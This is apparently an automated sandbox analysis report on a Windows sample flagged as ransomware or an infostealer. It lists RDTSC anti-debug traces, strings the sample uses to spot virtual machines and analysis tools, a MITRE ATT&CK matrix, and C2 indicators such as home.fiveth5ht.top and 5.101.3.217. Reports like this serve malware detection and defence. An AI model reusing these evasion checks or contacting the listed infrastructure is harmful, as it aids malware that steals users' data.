Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E11192 second address: 6E111DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C3180h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+0Ch] 0x0000000c jmp 00007F7B216C3180h 0x00000011 mov dword ptr [edx+0Ch], eax 0x00000014 pushad 0x00000015 mov ecx, 772E530Dh 0x0000001a push eax 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e popad 0x0000001f mov eax, dword ptr [esi+10h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F7B216C3181h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E111DD second address: 6E1124C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c pushad 0x0000000d mov dx, cx 0x00000010 pushfd 0x00000011 jmp 00007F7B212E85D8h 0x00000016 sbb esi, 32D3C1E8h 0x0000001c jmp 00007F7B212E85CBh 0x00000021 popfd 0x00000022 popad 0x00000023 mov eax, dword ptr [esi+14h] 0x00000026 jmp 00007F7B212E85D6h 0x0000002b mov dword ptr [edx+14h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov bx, 6460h 0x00000035 movsx edi, si 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1124C second address: 6E1126D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dh 0x00000005 mov cx, 8E89h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esi+18h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7B216C317Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1126D second address: 6E1127C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1127C second address: 6E11282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E11282 second address: 6E11286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E11286 second address: 6E112B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+18h], eax 0x0000000b pushad 0x0000000c mov ecx, edx 0x0000000e mov cl, bl 0x00000010 popad 0x00000011 mov eax, dword ptr [esi+1Ch] 0x00000014 jmp 00007F7B216C3180h 0x00000019 mov dword ptr [edx+1Ch], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E112B3 second address: 6E112B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E112B7 second address: 6E112BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E112BB second address: 6E112C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E112C1 second address: 6E1131B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C3184h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+20h] 0x0000000c jmp 00007F7B216C3180h 0x00000011 mov dword ptr [edx+20h], eax 0x00000014 jmp 00007F7B216C3180h 0x00000019 mov eax, dword ptr [esi+24h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F7B216C3187h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1131B second address: 6E113B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7B212E85CFh 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F7B212E85D9h 0x0000000f jmp 00007F7B212E85CBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [edx+24h], eax 0x0000001b jmp 00007F7B212E85D6h 0x00000020 mov eax, dword ptr [esi+28h] 0x00000023 jmp 00007F7B212E85D0h 0x00000028 mov dword ptr [edx+28h], eax 0x0000002b jmp 00007F7B212E85D0h 0x00000030 mov ecx, dword ptr [esi+2Ch] 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F7B212E85D7h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E113B2 second address: 6E113B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E113B8 second address: 6E113CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+2Ch], ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7B212E85CAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E113CF second address: 6E11423 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7B216C3181h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F7B216C3181h 0x0000000f adc si, 7DD6h 0x00000014 jmp 00007F7B216C3181h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ax, word ptr [esi+30h] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F7B216C317Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E11423 second address: 6E1144B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7B212E85CDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1144B second address: 6E1145B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B216C317Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1145B second address: 6E1145F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1145F second address: 6E114E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+32h] 0x0000000c jmp 00007F7B216C3187h 0x00000011 mov word ptr [edx+32h], ax 0x00000015 jmp 00007F7B216C3186h 0x0000001a mov eax, dword ptr [esi+34h] 0x0000001d pushad 0x0000001e push ecx 0x0000001f push edx 0x00000020 pop esi 0x00000021 pop ebx 0x00000022 push eax 0x00000023 mov dl, FAh 0x00000025 pop ecx 0x00000026 popad 0x00000027 mov dword ptr [edx+34h], eax 0x0000002a pushad 0x0000002b mov edi, 7EC2D7DEh 0x00000030 popad 0x00000031 test ecx, 00000700h 0x00000037 jmp 00007F7B216C3181h 0x0000003c jne 00007F7B8F6B13C3h 0x00000042 jmp 00007F7B216C317Eh 0x00000047 or dword ptr [edx+38h], FFFFFFFFh 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E114E8 second address: 6E114EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E60BCF second address: 6E60BD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E60BD3 second address: 6E60BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E60BD9 second address: 6E60BDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E60BDF second address: 6E60BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E60BE3 second address: 6E60C74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e call 00007F7B216C317Dh 0x00000013 pop eax 0x00000014 pop edi 0x00000015 mov ax, 71CDh 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007F7B216C3183h 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F7B216C3186h 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 mov di, si 0x0000002c pushfd 0x0000002d jmp 00007F7B216C317Ah 0x00000032 add si, C078h 0x00000037 jmp 00007F7B216C317Bh 0x0000003c popfd 0x0000003d popad 0x0000003e pop ebp 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F7B216C3185h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E00642 second address: 6E0066F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7B212E85CDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E0066F second address: 6E00676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E00676 second address: 6E006B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7B212E85D5h 0x00000011 sbb si, 2186h 0x00000016 jmp 00007F7B212E85D1h 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E006B0 second address: 6E006B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E006B5 second address: 6E006E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7B212E85D5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E006E8 second address: 6E00719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C3181h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F7B216C3183h 0x00000013 pop esi 0x00000014 mov eax, ebx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E00719 second address: 6E0073B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, E773h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7B212E85D5h 0x00000012 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSpecial instruction interceptor: First address: 1671BD7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSpecial instruction interceptor: First address: 18245AB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSpecial instruction interceptor: First address: 18A7DFE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_01179980 rdtsc 0_2_01179980
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe TID: 7288Thread sleep time: -38019s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe TID: 7292Thread sleep time: -50025s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe TID: 7268Thread sleep time: -34017s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe TID: 7256Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00F9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00F9255D
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00F929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00F929FF
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00F9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00F9255D
Source: f7qbEfJl0B.exe, f7qbEfJl0B.exe, 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: f7qbEfJl0B.exeBinary or memory string: Hyper-V RAW
Source: f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: f7qbEfJl0B.exe, 00000000.00000003.2159624381.000000000076E000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000003.2118952483.0000000000729000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000002.2173176554.000000000077A000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000003.2160083442.0000000000779000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~%[
Source: f7qbEfJl0B.exe, 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: f7qbEfJl0B.exe, 00000000.00000003.1767543389.0000000000713000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeFile opened: NTICE
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeFile opened: SICE
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_01179980 rdtsc 0_2_01179980
Source: f7qbEfJl0B.exe, f7qbEfJl0B.exe, 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 5.101.3.217:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		Remote Services11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
f7qbEfJl0B.exe39%ReversingLabsWin32.Ransomware.Generic
f7qbEfJl0B.exe100%AviraTR/Crypt.TPM.Gen
f7qbEfJl0B.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fiveth5ht.top/OyKvQ0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQ~0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a10%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5ht.top
5.101.3.217
truefalse
    		high
    httpbin.org
    		34.226.108.155
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlf7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            http://home.fiveth5ht.top/OyKvQf7qbEfJl0B.exe, f7qbEfJl0B.exe, 00000000.00000003.2159624381.000000000076E000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000002.2173176554.000000000077A000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000003.2160083442.0000000000779000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              http://html4/loose.dtdf7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpfalse
                		high
                https://curl.se/docs/alt-svc.html#f7qbEfJl0B.exefalse
                  		high
                  http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1f7qbEfJl0B.exe, 00000000.00000002.2172952081.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://httpbin.org/ipbeforef7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    https://curl.se/docs/http-cookies.htmlf7qbEfJl0B.exe, f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      https://curl.se/docs/hsts.html#f7qbEfJl0B.exefalse
                        		high
                        http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSf7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://home.fiveth5ht.top/OyKvQ~f7qbEfJl0B.exe, 00000000.00000003.2159624381.000000000076E000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000002.2173176554.000000000077A000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000003.2160083442.0000000000779000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://curl.se/docs/http-cookies.html#f7qbEfJl0B.exefalse
                            		high
                            https://curl.se/docs/alt-svc.htmlf7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://.cssf7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://.jpgf7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  34.226.108.155
                                  		httpbin.orgUnited States
                                  		14618AMAZON-AESUSfalse
                                  5.101.3.217
                                  		home.fiveth5ht.topRussian Federation
                                  		34665PINDC-ASRUfalse

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1581409
                                  Start date and time:2024-12-27 15:11:23 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 4m 58s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
